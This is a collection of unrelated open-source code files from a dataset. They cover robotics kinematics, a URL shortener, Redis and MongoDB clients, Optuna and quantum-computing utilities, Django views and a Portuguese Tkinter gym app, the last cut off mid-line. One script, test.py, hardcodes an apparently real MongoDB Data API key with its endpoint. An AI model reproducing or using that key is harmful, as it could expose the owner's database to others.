(default: None)\n Joint angles.\n\n return_cached_result : bool, optional (default: False)\n Return cached result of previous forward kinematics calculation.\n\n Returns\n -------\n pos : array, shape (n_markers_per_finger, 3)\n Vertex positions.\n \"\"\"\n if return_cached_result:\n assert self.last_forward_result is not None\n return self.last_forward_result\n\n self._optimizer_pose[3:] = pose\n self.last_forward_result = hand_vertices(\n pose=self._optimizer_pose, **self.finger_pose_params)\n return self.last_forward_result\n\n def inverse(self, position):\n \"\"\"Estimate finger joint parameters from position.\n\n Parameters\n ----------\n position : array, shape (n_markers_per_finger, 3)\n Desired position of vertices.\n\n Returns\n -------\n current_pose : array, shape (n_finger_joints * 3,)\n Joint angles.\n \"\"\"\n res = minimize(self.finger_error, self.current_pose, args=(position,),\n method=\"SLSQP\", bounds=self.bounds) # SLSQP, COBYLA\n self.current_pose[:] = res[\"x\"]\n return self.current_pose\n\n\nclass FingerError:\n \"\"\"Compute error function for finger.\n\n Parameters\n ----------\n forward_kinematics : callable\n Forward kinematics\n\n action_weights : array, shape (2, n_joints * 3)\n Weight of action penalty in error function for fingers.\n \"\"\"\n def __init__(self, forward_kinematics, action_weights):\n self.forward_kinematics = forward_kinematics\n self.action_weights = action_weights\n\n def __call__(self, finger_pose, desired_finger_pos):\n \"\"\"Compute error for numerical inverse kinematics.\n\n Parameters\n ----------\n finger_pose : array, shape (n_finger_joints * 3,)\n Joint angles.\n\n desired_finger_pos : array, shape (n_markers_per_finger, 3)\n Desired finger positions.\n \"\"\"\n positions = self.forward_kinematics(finger_pose)\n desired_finger_pos = np.atleast_2d(desired_finger_pos)\n\n # TODO seems fragile, what if we only have a middle marker and no tip?\n # in case there are no middle markers available:\n positions = positions[:len(desired_finger_pos)]\n\n pos_finger_pose = np.maximum(0.0, finger_pose)\n neg_finger_pose = -np.minimum(0.0, finger_pose)\n\n # squared cost improves result and speed drastically in comparison\n # to non-squared cost\n errors = np.linalg.norm(desired_finger_pos - positions, axis=1) ** 2\n error = np.nansum(errors)\n\n regularization = (\n np.dot(self.action_weights[0], pos_finger_pose) ** 2\n + np.dot(self.action_weights[1], neg_finger_pose) ** 2)\n\n return error + regularization\n","repo_name":"dfki-ric/hand_embodiment","sub_path":"hand_embodiment/record_markers.py","file_name":"record_markers.py","file_ext":"py","file_size_in_byte":19639,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"44"} +{"seq_id":"27529035932","text":"from .models import URLEntry\n\ndef UniqueID(url, user):\n #expects that url is a string and user is a User object\n cleaned_url = url.replace(\"http://\", \"\")\n cleaned_url = cleaned_url.replace(\"www\", \"\")\n cleaned_url = cleaned_url.replace(\"/\", \"\")\n cleaned_url = cleaned_url.replace(\".\", \"\")\n url_len = len(cleaned_url)\n num_digits = (url_len % 5) + 1\n interval = len(cleaned_url)/num_digits\n index = 0\n id = \"\"\n for x in range(0,num_digits):\n if index < len(cleaned_url):\n id += cleaned_url[index]\n index += interval\n\n\n is_duplicate = False\n previous_url_entry = URLEntry.objects.filter(url_id=id)\n if previous_url_entry.exists():\n if previous_url_entry[0].user == user and previous_url_entry[0].original_url == url:\n is_duplicate = True\n else:\n id = ((url_len + 1)*len(id))%10000\n previous_url_entry = URLEntry.objects.filter(url_id=id)\n while previous_url_entry.exists() and len(str(id))<6:\n if previous_url_entry[0].user == user and previous_url_entry[0].original_url == url:\n is_duplicate = True\n break\n else:\n id += 1\n previous_url_entry = URLEntry.objects.filter(url_id=id)\n\n if URLEntry.objects.filter(url_id=id).exists() and not is_duplicate:\n #if for some reason we end up here, which we probably won't, the empty string means we couldn't find a place for it\n id = \"\"\n\n return str(id), is_duplicate\n\ndef CreateShortenedURL(username, id):\n return str(\"remishakes.herokuapp.com/kg.\" + str(username) + \".\" + str(id) + \"/\")\n # url(r'^host_site/(?P\\w+\\d*).(?P\\w{1,10})$', views.URLRedirect, name='url_redirect'),\n\n\ndef IsUserLoggedIn(request, username):\n return request.user.username == username\n","repo_name":"KrisG014/SampleProjects","sub_path":"mysite/URLShortener/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15642154583","text":"from .parser import Reader\nfrom .errors import ConnectionClosedError\n\n\nclass Connection:\n def __init__(self, sock, encoding=\"utf-8\", max_recv=2**16):\n self._sock = sock\n self._encoding = encoding\n self._reader = Reader(encoding=encoding)\n self._max_recv = max_recv\n\n async def send_command(self, *args):\n lines = []\n lines.append(\"*%d\" % len(args))\n for arg in args:\n lines.append(\"$%d\" % len(arg))\n lines.append(arg)\n data = (\"\\r\\n\".join(lines) + \"\\r\\n\").encode(self._encoding)\n sent = await self._sock.sendall(data)\n return sent\n\n async def recv_response(self):\n while True:\n data = await self._sock.recv(self._max_recv)\n if not data:\n raise ConnectionClosedError(\"connection closed by peer\")\n self._reader.feed(data)\n res = self._reader.gets()\n if res is False: # don't want to ignore None\n continue\n return res\n","repo_name":"quiribot/curioredis","sub_path":"curioredis/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"38338792862","text":"import requests,json\nfrom tabulate import tabulate\nurl = \"https://ap-southeast-1.aws.data.mongodb-api.com/app/data-zbetm/endpoint/data/v1/action/\"\napikey = \"hSl7T5DEqopdOtu6JYzUI4taQ6BwUmTSNRtBl2VXwIwpnMfjv13fsnpMxdgQltSX\"\nheaders = {\n 'Content-Type': 'application/json',\n 'Access-Control-Request-Headers': '*',\n 'api-key': apikey,\n} \ndef Search(message):\n option = ['-d','-n','-o']\n message = message.split(' ')\n op = [0]*3\n for msg in message:\n if msg in option:\n if(msg == '-d'):\n op[0] = message[message.index(msg) + 1]\n if(msg == '-n'):\n op[1] = message[message.index(msg) + 1]\n if(msg == '-o'):\n op[2] = message[message.index(msg) + 1]\n filter = {}\n if(op[0]):\n filter['upload_date'] = op[0]\n if(op[1]):\n filter['filename'] = op[1]\n if(op[2]):\n filter['owner'] = op[2]\n action = url + \"find\"\n payload = json.dumps({\n \"collection\": \"Documents\",\n \"database\": \"CompanyStorage\",\n \"dataSource\": \"Cluster0\",\n \"filter\" : filter,\n \"projection\":{\n \"filename\":1,\n \"owner\":1,\n \"upload_date\":1,\n \"sha256\":1\n }\n }) \n \n response = requests.request(\"POST\", action, headers=headers, data=payload)\n result = json.loads(response.text)['documents']\n to_print = len(result)*[0]\n for i in range(0,len(result)):\n to_print[i] = result[i]['_id'], result[i]['filename'],result[i]['owner'],result[i]['upload_date'],result[i]['sha256']\n print(tabulate(to_print,headers=['ID','File Name','Owner','Upload Date','SHA256'],tablefmt='grid'))\n\nmsg = '/search -o hello'\nSearch(msg)","repo_name":"toomhufm/SecloudityConsole","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"69885566853","text":"import sys\nfrom typing import List\n\ninput = sys.stdin.readline\n\n\ndef solution(board: List[List[int]]) -> int:\n row, calumn = len(board), len(board[0])\n directions = [(1, 0), (0, -1), (-1, 0), (0, 1)]\n\n def dfs(r, c, board):\n stack = [(r, c)]\n board[r][c] = 0\n size = 1\n while stack:\n tr, tc = stack[-1]\n remove = True\n for dr, dc in directions:\n if 0 <= tr + dr < row and 0 <= tc + dc < calumn:\n if board[tr + dr][tc + dc]:\n board[tr + dr][tc + dc] = 0\n stack.append((tr + dr, tc + dc))\n remove = False\n size += 1\n break\n if remove:\n stack.pop()\n return size\n\n global_max = -1\n for r in range(row):\n for c in range(calumn):\n if board[r][c]:\n local_max = dfs(r, c, board)\n global_max = local_max if local_max > global_max else global_max\n\n return global_max\n\n\nN, M, K = map(int, input().split())\nboard = [[0] * M for _ in range(N)]\nfor _ in range(K):\n r, c = map(int, input().split())\n board[r - 1][c - 1] = 1\nprint(solution(board))","repo_name":"vincent-kk/Basic-Algorithm","sub_path":"12. DFS/1743.py","file_name":"1743.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"17224175858","text":"from typing import List\n\nimport numpy as np\n\nimport optuna\n\n\ndef _solve_hssp(\n rank_i_loss_vals: np.ndarray,\n rank_i_indices: np.ndarray,\n subset_size: int,\n reference_point: np.ndarray,\n) -> np.ndarray:\n \"\"\"Solve a hypervolume subset selection problem (HSSP) via a greedy algorithm.\n\n This method is a 1-1/e approximation algorithm to solve HSSP.\n\n For further information about algorithms to solve HSSP, please refer to the following\n paper:\n\n - `Greedy Hypervolume Subset Selection in Low Dimensions\n `_\n \"\"\"\n selected_vecs: List[np.ndarray] = []\n selected_indices: List[int] = []\n contributions = [\n optuna._hypervolume.WFG().compute(np.asarray([v]), reference_point)\n for v in rank_i_loss_vals\n ]\n hv_selected = 0.0\n while len(selected_indices) < subset_size:\n max_index = int(np.argmax(contributions))\n contributions[max_index] = -1 # mark as selected\n selected_index = rank_i_indices[max_index]\n selected_vec = rank_i_loss_vals[max_index]\n for j, v in enumerate(rank_i_loss_vals):\n if contributions[j] == -1:\n continue\n p = np.max([selected_vec, v], axis=0)\n contributions[j] -= (\n optuna._hypervolume.WFG().compute(np.asarray(selected_vecs + [p]), reference_point)\n - hv_selected\n )\n selected_vecs += [selected_vec]\n selected_indices += [selected_index]\n hv_selected = optuna._hypervolume.WFG().compute(np.asarray(selected_vecs), reference_point)\n\n return np.asarray(selected_indices, dtype=int)\n","repo_name":"optuna/optuna","sub_path":"optuna/_hypervolume/hssp.py","file_name":"hssp.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":8930,"dataset":"github-code","pt":"44"} +{"seq_id":"10176171421","text":"from itertools import product, tee\n\nGRID_SIZE = 300\n\n\ndef get_power_level(x, y, sn):\n # global grid_serial_number\n rack_id = x + 10\n power_level = rack_id * y\n power_level += sn\n power_level *= rack_id\n power_level = (power_level // 100) % 10\n power_level -= 5\n return power_level\n\n\ndef main():\n with open('11.in', 'r') as f:\n sn = int(f.read())\n\n grid = {}\n known_levels = set()\n\n for x, y in product(*tee(range(1, GRID_SIZE+1), 2)):\n level = get_power_level(x, y, sn)\n grid[(x, y)] = level\n known_levels.add(level)\n\n max_charge = min(known_levels) * 9\n strongest_cell = (None, None)\n strongest_size = None\n for s in range(2, GRID_SIZE+1):\n for x in range(1, GRID_SIZE+1-s, 1):\n for y in range(1, GRID_SIZE+1-s, 1):\n cell_charge = []\n for i, j in product(*tee(range(s), 2)):\n cell_charge.append(grid[(x+i, y+j)])\n if sum(cell_charge) > max_charge:\n max_charge = sum(cell_charge)\n strongest_cell = (x, y)\n strongest_size = s\n\n if s == 3:\n print(f\"part 1: {strongest_cell}\")\n\n print(f\"part 2: {strongest_cell},{strongest_size}\")\n\nif __name__ == '__main__':\n main()\n\n\n\n\n","repo_name":"semion/advent_2018","sub_path":"11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19150197113","text":"from django.contrib import messages\nfrom django.shortcuts import redirect, render\nfrom django.urls import reverse\nfrom django.contrib.auth.decorators import login_required\nfrom .api import api\nfrom oauthlib.common import generate_token\nfrom oauth2_provider.models import AccessToken, Application\nfrom django.utils import timezone\nfrom dateutil.relativedelta import relativedelta\nfrom oauth2_provider.models import RefreshToken\nfrom django.conf import settings\n\n\n@login_required\ndef me(request):\n return redirect(\n reverse(\"journal:user_profile\", args=[request.user.mastodon_username])\n )\n\n\ndef home(request):\n if request.user.is_authenticated:\n home = request.user.get_preference().classic_homepage\n if home == 1:\n return redirect(\n reverse(\"journal:user_profile\", args=[request.user.mastodon_username])\n )\n elif home == 2:\n return redirect(reverse(\"social:feed\"))\n else:\n return redirect(reverse(\"catalog:discover\"))\n else:\n return redirect(reverse(\"catalog:discover\"))\n\n\ndef error_400(request, exception=None):\n return render(\n request,\n \"400.html\",\n {\"exception\": exception},\n status=400,\n )\n\n\ndef error_403(request, exception=None):\n return render(request, \"403.html\", status=403)\n\n\ndef error_404(request, exception=None):\n return render(request, \"404.html\", status=404)\n\n\ndef error_500(request, exception=None):\n return render(request, \"500.html\", status=500)\n\n\n@login_required\ndef developer(request):\n token = None\n if request.method == \"POST\":\n user = request.user\n app = Application.objects.filter(\n client_id=settings.DEVELOPER_CONSOLE_APPLICATION_CLIENT_ID\n ).first()\n if app:\n for token in AccessToken.objects.filter(user=user, application=app):\n token.revoke()\n token = generate_token()\n AccessToken.objects.create(\n user=user,\n application=app,\n scope=\"read write\",\n expires=timezone.now() + relativedelta(days=365),\n token=token,\n )\n else:\n token = \"Configuration error, contact admin\"\n context = {\n \"api\": api,\n \"token\": token,\n \"openapi_json_url\": reverse(f\"{api.urls_namespace}:openapi-json\"),\n }\n return render(request, \"developer.html\", context)\n","repo_name":"Haruha-Raharu/neodb","sub_path":"common/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"37855434829","text":"import numpy as np\nimport pickle as pkl\nfrom sklearn.random_projection import johnson_lindenstrauss_min_dim as jl_dim\nimport torch\n\nfrom common.nb_utils import pca_transform\nfrom common.utils import decor_print, get_device, get_random_vector\nfrom data.loader import get_dataloader\nfrom models.utils import forward, get_loss_fn, get_model, get_optim\nfrom models.model_op import get_layer_size, get_model_grads\n\n\ndef stack_layers(sdirs):\n stacked = []\n for layer_num in range(len(sdirs[0])):\n stacked.append(\n np.hstack(\n [_[layer_num].reshape(-1, 1).cpu().numpy() for _ in sdirs]\n )\n )\n\n return stacked\n\n\ndef get_dga_sdirs(args, data, labels):\n device = get_device(args)\n sdirs = []\n for x, y in zip(data, labels):\n # dga_bs: dist grad accum. batch size\n dataloader = get_dataloader(x, y, args.dga_bs, shuffle=False)\n count = 0\n for xiter, yiter in dataloader:\n model, loss_type = get_model(args, False)\n loss_fn = get_loss_fn(loss_type)\n opt = get_optim(args, model)\n\n loss, _ = forward(\n model, xiter, yiter, opt, loss_fn, device)\n loss.backward()\n sdirs.append(get_model_grads(model, flatten=True))\n count += 1\n if count >= args.num_dga:\n break\n\n stacked = [[] for _ in range(len(sdirs[0]))]\n\n for l in range(len(sdirs[0])):\n for i in range(len(sdirs)):\n stacked[l].append(sdirs[i][l].flatten())\n\n sdirs = [[] for _ in range(args.ncomponent)]\n for l, layer in enumerate(stacked):\n layer = torch.stack(layer, dim=0).T.cpu().numpy()\n layer, _ = pca_transform(layer, args.ncomponent)\n for i in range(args.ncomponent):\n sdirs[i].append(layer[:, i].flatten())\n\n assert len(sdirs) == args.ncomponent\n\n return sdirs\n\n\ndef get_jl_dim(samples, eps):\n return max([jl_dim(s, eps)[0] for s in samples])\n\n\ndef load_sdirs(path):\n sdirs = pkl.load(open(path, 'rb'))\n sdirs = [[torch.Tensor(l) for l in sdir] for sdir in sdirs]\n decor_print('ncomponents: {}'.format(len(sdirs)))\n\n return sdirs\n\n\ndef get_rp_dirs(args, model):\n if not args.ncomponent:\n num_sdirs = get_jl_dim(layer_sizes, args.rp_eps)\n else:\n num_sdirs = args.ncomponent\n layer_sizes = get_layer_size(model)\n decor_print('Number of directions for eps {}: {}'.format(\n args.rp_eps, num_sdirs))\n\n return [\n [\n get_random_vector(1.0, np.sqrt(num_sdirs), s)\n for s in layer_sizes\n ] for _ in range(num_sdirs)\n ]\n\n\ndef get_rp_block(args, model):\n if not args.ncomponent:\n num_sdirs = get_jl_dim(layer_sizes, args.rp_eps)\n else:\n num_sdirs = args.ncomponent\n layer_sizes = get_layer_size(model)\n decor_print('Number of directions for eps {}: {}'.format(\n args.rp_eps, num_sdirs))\n\n return [\n get_random_vector(1.0, np.sqrt(num_sdirs), (num_sdirs, s[0]))\n for s in layer_sizes\n ]\n\n\ndef get_sdirs(args, model, paths, X, y):\n sdirs = []\n if args.paradigm:\n if 'rp' in args.paradigm:\n sdirs = get_rp_dirs(args, model)\n elif 'pca' in args.paradigm:\n print('Loading: {}'.format(paths.pca_path))\n sdirs = load_sdirs(paths.pca_path)\n elif 'dga' in args.paradigm:\n print('Loading: {}'.format(paths.dga_path))\n sdirs = load_sdirs(paths.dga_path)\n\n return sdirs\n","repo_name":"shams-sam/FedOptim","sub_path":"src/common/approximation.py","file_name":"approximation.py","file_ext":"py","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"44"} +{"seq_id":"12049428329","text":"from typing import TYPE_CHECKING, Dict, Sequence\n\nimport numpy as np\n\nif TYPE_CHECKING:\n from zquantum.core.distribution import MeasurementOutcomeDistribution\n\n\ndef compute_rbf_kernel(x_i: np.ndarray, y_j: np.ndarray, sigma: float) -> np.ndarray:\n \"\"\"Compute the gaussian (RBF) kernel matrix K, with K_ij = exp(-gamma |x_i - y_j|^2)\n and gamma = 1/(2*sigma).\n\n Args:\n x_i: Samples A (integers).\n y_j: Samples B (integers).\n sigma: The bandwidth of the gaussian kernel.\n\n Returns:\n np.ndarray: The gaussian kernel matrix.\n \"\"\"\n exponent = np.abs(x_i[:, None] - y_j[None, :]) ** 2\n try:\n gamma = 1.0 / (2 * sigma)\n except ZeroDivisionError as error:\n print(\"Handling run-time error:\", error)\n raise\n kernel_matrix = np.exp(-gamma * exponent)\n return kernel_matrix\n\n\ndef compute_multi_rbf_kernel(\n x_i: np.ndarray, y_j: np.ndarray, sigmas: Sequence[float]\n) -> np.ndarray:\n \"\"\"Compute the multi-gaussian (RBF) kernel matrix K, with\n\n K_ij = 1/N * Sum_n [exp(-gamma_n |x_i - y_j|^2)]\n\n with n = 1,...,N and gamma = 1/(2*sigma).\n\n Args:\n x_i: Samples A (integers).\n y_j: Samples B (integers).\n sigmas: The list of bandwidths of the multi-gaussian kernel.\n\n Returns:\n np.ndarray: The gaussian kernel matrix.\n \"\"\"\n exponent = np.abs(x_i[:, None] - y_j[None, :]) ** 2\n kernel_matrix = np.zeros(exponent.shape)\n for sigma in sigmas:\n try:\n gamma = 1.0 / (2 * sigma)\n except ZeroDivisionError as error:\n print(\"Handling run-time error:\", error)\n raise\n kernel_matrix += np.exp(-gamma * exponent)\n return kernel_matrix / len(sigmas)\n\n\ndef compute_mmd(\n target_distribution: \"MeasurementOutcomeDistribution\",\n measured_distribution: \"MeasurementOutcomeDistribution\",\n distance_measure_parameters: Dict,\n) -> float:\n \"\"\"Compute the squared Maximum Mean Discrepancy (MMD) distance measure between\n between a target distribution and a measured distribution.\n Reference: arXiv.1804.04168.\n\n Args:\n target_distribution: The target probability distribution.\n measured_distribution: The measured probability distribution.\n\n distance_measure_parameters:\n sigma (float/np.array): the bandwidth parameter used to compute the\n single/multi gaussian kernel. The default value is 1.0.\n\n Returns:\n The value of the maximum mean discrepancy.\n \"\"\"\n\n sigma = distance_measure_parameters.get(\"sigma\", 1.0)\n target_keys = target_distribution.distribution_dict.keys()\n measured_keys = measured_distribution.distribution_dict.keys()\n all_keys = set(target_keys).union(measured_keys)\n\n target_values = []\n measured_values = []\n for bitstring in all_keys:\n # Add 0 to the values list whenever a bistrings isn't found among the keys.\n target_values.append(target_distribution.distribution_dict.get(bitstring, 0))\n measured_values.append(\n measured_distribution.distribution_dict.get(bitstring, 0)\n )\n\n basis = np.asarray(\n [int(\"\".join(map(str, item)), 2) for item in all_keys]\n ) # Digit Tuple to int\n if not hasattr(sigma, \"__len__\"):\n kernel_matrix = compute_rbf_kernel(basis, basis, sigma)\n else:\n kernel_matrix = compute_multi_rbf_kernel(basis, basis, sigma)\n\n diff = np.array(target_values) - np.array(measured_values)\n return diff.dot(kernel_matrix.dot(diff))\n","repo_name":"zapatacomputing/z-quantum-core","sub_path":"src/python/zquantum/core/distribution/mmd.py","file_name":"mmd.py","file_ext":"py","file_size_in_byte":3541,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"44"} +{"seq_id":"72363761413","text":"''' Programação do Protótipo - POWER UP do Instrutor'''\r\n\r\n# Impotando as blibliotecas \r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\nfrom tkinter import ttk\r\nimport sqlite3\r\nfrom datetime import date\r\nfrom datetime import datetime\r\nfrom random import choice, randint \r\n\r\n# Tela para edição da Ficha dos Alunos\r\nclass Tela_Fichas(Toplevel):\r\n # Atributos do app\r\n cor_laranja = '#f48c06'\r\n cor_cinza = '#ced4da'\r\n pessoas = []\r\n alunos = ['Gabriel', 'Rafaela', 'Alexandre', 'Milena', 'Kauã', 'Júlia', 'Ana']\r\n\r\n def __init__(self, original):\r\n self.original_frame = original\r\n Toplevel.__init__(self) # Importando o Metódo Construtor\r\n self.title('Fichas dos Alunos') \r\n self.geometry('1340x680+290+200')\r\n self.configure(bg = 'white')\r\n # Ícone\r\n self.iconbitmap('powerup_icone.ico')\r\n\r\n self.widgets()\r\n self.lista_frame2()\r\n self.get_aluno()\r\n\r\n def widgets(self):\r\n self.frame1 = Frame(self, bg = self.cor_laranja) # Frame para o título principal FICHA DOS ALUNOS\r\n self.frame1.place(relx = 0, rely = 0, relwidth = 1, relheight = 0.13)\r\n\r\n self.frame2 = Frame(self, bg = self.cor_cinza) # Frame para o título principal FICHA DOS ALUNOS\r\n self.frame2.place(relx = 0.03, rely = 0.15, relwidth = 0.94, relheight = 0.1)\r\n\r\n self.titulo = Label(self.frame1, # Titulo 'FICHA DOS ALUNOS'\r\n text='FICHA DOS ALUNOS',\r\n font=('Britannic Bold', 30),\r\n bg=self.cor_laranja,\r\n fg='black')\r\n self.titulo.place(relx = 0.1, rely = 0.15)\r\n\r\n self.pesquisa_entry = Entry(self.frame2, # Entrada de pesquisa\r\n bg='white',\r\n fg='black',\r\n font=('Britannic Bold', 16))\r\n self.pesquisa_entry.place(relx = 0.24, rely = 0.21, relwidth = 0.75, relheight = 0.56)\r\n\r\n self.btn_novo_aluno = Button(self, # Botão de Atualizar Informações\r\n bg = self.cor_laranja,\r\n fg='white',\r\n text='Novo Aluno',\r\n font=('Britannic Bold', 20))\r\n self.btn_novo_aluno.place(relx = 0.25, rely = 0.8, relwidth = 0.17, relheight = 0.08)\r\n\r\n self.img = PhotoImage(file='btn_pesquisa_aluno.png') # Botão de voltar para a página anterior \r\n self.btn_pesquisa = Button(self, image=self.img, command=self.busca_aluno)\r\n self.btn_pesquisa.place(relx=0.05, rely=0.16)\r\n\r\n self.img1 = PhotoImage(file='btn_voltar.PNG') # Botão de voltar para a página anterior \r\n self.btn_voltar = Button(self, image=self.img1, command= self.clica_voltar)\r\n self.btn_voltar.place(relx=0.1, rely=0.8)\r\n\r\n def lista_frame2(self):\r\n self.listaCli = ttk.Treeview(self, height = 0, column = (\"col1\", \"col2\"))\r\n self.listaCli.place(relx = 0.03, rely = 0.26, relwidth = 0.94, relheight = 0.53)\r\n self.listaCli.heading(\"#0\", text = '')\r\n self.listaCli.heading(\"#1\", text = \"Identificação\")\r\n self.listaCli.heading(\"#2\", text = \"Nome\")\r\n\r\n self.listaCli.column('#0', width=0)\r\n self.listaCli.column('#1', stretch=YES, minwidth=25, width=100, anchor=\"center\")\r\n self.listaCli.column('#2', stretch=YES, minwidth=25, width=100, anchor=\"center\")\r\n\r\n # Configurações para a Barra de Rolagem do Treeview\r\n self.barra_de_rolagem = Scrollbar(self.listaCli, orient = \"vertical\")\r\n self.listaCli.configure(yscroll = self.barra_de_rolagem.set)\r\n self.barra_de_rolagem.place(relx=0.98, rely = 0.032, relheight = 0.96)\r\n\r\n # Realiza um onDoubleClick para abrir a ficha do aluno \r\n self.listaCli.bind(\"\", self.onDoubleClick)\r\n\r\n def get_aluno(self):\r\n # Lista de alunos \r\n for n in self.alunos:\r\n self.listaCli.insert(\"\", END, values=n)\r\n\r\n def busca_aluno(self):\r\n self.pesquisa = self.pesquisa_entry.get()\r\n for n in self.alunos:\r\n if self.pesquisa == n:\r\n self.listaCli.delete(*self.listaCli.get_children())\r\n self.listaCli.insert('', END, values=n)\r\n\r\n def onDoubleClick(self, event):\r\n self.listaCli.selection()\r\n print('Aluno Selecionado')\r\n\r\n def clica_voltar(self): # Comando do botão\r\n self.hide()\r\n self.subframe = Tela_Inicial(self) # Próxima janela para ser aberta\r\n\r\n def hide(self):\r\n self.withdraw()\r\n def show(self):\r\n self.update()\r\n self.deiconify()\r\n\r\n# Tela para obter uma planilha com o Fluxo de Alunos\r\nclass Tela_Fluxo(Toplevel):\r\n # Atributos do app\r\n cor_laranja = '#f48c06'\r\n cor_cinza = '#ced4da'\r\n hora = 0\r\n pessoas = []\r\n alunos = ['Gabriel', 'Rafaela', 'Alexandre', 'Milena', 'Kauã', 'Júlia', 'Ana Moura']\r\n\r\n def __init__(self, original):\r\n self.original_frame = original\r\n Toplevel.__init__(self) # Importando o Metódo Construtor\r\n self.title('Fluxo de Alunos') \r\n self.geometry('1340x680+290+200')\r\n self.configure(bg = 'white')\r\n # Ícone\r\n self.iconbitmap('powerup_icone.ico')\r\n\r\n self.widgets()\r\n self.lista_frame2()\r\n self.get_log()\r\n self.conta_presentes()\r\n\r\n def lista_frame2(self):\r\n self.listaCli = ttk.Treeview(self.frame2, height = 0, column = (\"col1\", \"col2\", \"col3\"))\r\n self.listaCli.place(relx = 0.01, rely = 0.05, relwidth = 0.56, relheight = 0.75)\r\n self.listaCli.heading(\"#0\", text = \"\")\r\n self.listaCli.heading(\"#1\", text = \"Identificação\")\r\n self.listaCli.heading(\"#2\", text = \"Entrada\")\r\n self.listaCli.heading(\"#3\", text = \"Saída\")\r\n\r\n self.listaCli.column('#0', stretch=YES, width=0, anchor=\"center\")\r\n self.listaCli.column('#1', stretch=YES, minwidth=10, width=25, anchor=\"center\")\r\n self.listaCli.column('#2', stretch=YES, minwidth=25, width=40, anchor=\"center\")\r\n self.listaCli.column('#3', stretch=YES, minwidth=40, width=55, anchor=\"center\")\r\n\r\n # Configurações para a Barra de Rolagem do Treeview\r\n self.barra_de_rolagem = Scrollbar(self.listaCli, orient = \"vertical\")\r\n self.listaCli.configure(yscroll = self.barra_de_rolagem.set)\r\n self.barra_de_rolagem.place(relx=0.98, rely = 0.032, relheight = 0.96)\r\n\r\n def widgets(self):\r\n self.frame1 = Frame(self, bg = self.cor_laranja) # Frame para o título principal FLUXO DE ALUNOS\r\n self.frame1.place(relx = 0, rely = 0, relwidth = 1, relheight = 0.13)\r\n\r\n self.frame2 = Frame(self, bg = self.cor_cinza) # Frame para o quadro treeview\r\n self.frame2.place(relx = 0.45, rely = 0.22, relwidth = 0.95, relheight = 0.95)\r\n\r\n self.frame3 = Frame(self, bg = self.cor_cinza) # Frame para o título para a DATA DO DIA\r\n self.frame3.place(relx = 0.7, rely = 0.14, relwidth = 0.25, relheight = 0.07)\r\n\r\n self.frame4 = Frame(self, bg = self.cor_cinza) # Frame para a quantidade de alunos no momento\r\n self.frame4.place(relx = 0.23, rely = 0.76, relwidth = 0.2, relheight = 0.2)\r\n\r\n self.titulo = Label(self.frame1, # Titulo 'FLUXO DE ALUNOS'\r\n text='FLUXO DE ALUNOS',\r\n font=('Britannic Bold', 30),\r\n bg=self.cor_laranja,\r\n fg='black')\r\n self.titulo.place(relx = 0.1, rely = 0.15)\r\n\r\n self.txt1 = Label(self, # Título 'Você pode obter uma planilha com os alunos da academia:'\r\n text='Você pode obter uma planilha com os alunos da academia:',\r\n font=('Britannic', 20),\r\n bg='white',\r\n fg='black')\r\n self.txt1.place(relx = 0.02, rely = 0.15)\r\n\r\n self.txt2 = Label(self.frame4, # Título - Quantidade de pessoas \r\n text='Na academia agora:',\r\n font=('Britannic', 14),\r\n bg = self.cor_cinza,\r\n fg='black')\r\n self.txt2.place(relx = 0.032, rely = 0.03)\r\n\r\n self.img1 = PhotoImage(file='btn_obter_planilha.png') # Botão de Editar Perfil\r\n self.btn_edita = Button(self, image=self.img1, command = self.insere_log)\r\n self.btn_edita.place(relx=0.13, rely=0.22)\r\n\r\n self.img = PhotoImage(file='btn_voltar.PNG') # Botão de voltar para a página anterior \r\n self.btn_voltar = Button(self, image=self.img, command= self.clica_voltar)\r\n self.btn_voltar.place(relx=0.1, rely=0.8)\r\n\r\n # Configurações para a data do dia\r\n self.data_atual = date.today()\r\n self.data_e_hora_atuais = datetime.now()\r\n self.data_e_hora_em_texto = self.data_e_hora_atuais.strftime('%d/%m/%Y %H:%M')\r\n\r\n self.txt2 = Label(self.frame3, # Data do Dia\r\n text='{}'.format(self.data_e_hora_em_texto),\r\n font=('Britannic', 20, 'bold'),\r\n bg=self.cor_cinza,\r\n fg='black')\r\n self.txt2.place(relx = 0.1, rely = 0.16)\r\n self.alteracao()\r\n\r\n def alteracao(self):\r\n self.now = datetime.now()\r\n self.txt2['text'] = self.now.strftime('%d/%m/%Y %H:%M:%S') \r\n self.after(1000, self.alteracao)\r\n\r\n def get_log(self):\r\n for n in self.pessoas:\r\n self.listaCli.insert(\"\", END, values=n)\r\n self.conta_presentes()\r\n \r\n def insere_log(self):\r\n self.entrada = choice(self.alunos)\r\n self.contador = 0 \r\n for i in self.pessoas: # Percorre a lista de Pessoas\r\n if self.entrada == i[0] and len(i) < 3:\r\n self.listaCli.delete(*self.listaCli.get_children())\r\n i.append(self.txt2['text'])\r\n self.contador += 1\r\n \r\n if self.contador == 0:\r\n self.listaCli.delete(*self.listaCli.get_children())\r\n self.pessoas.append([self.entrada, self.txt2['text']])\r\n \r\n self.get_log() \r\n # Criar uma lista de nomes, inserir a entrada e a partir dela condiciona a saida, e inserir essas infrmações na lista do aluno determinado\r\n\r\n def conta_presentes(self):\r\n self.contador1 = 0 \r\n for i in 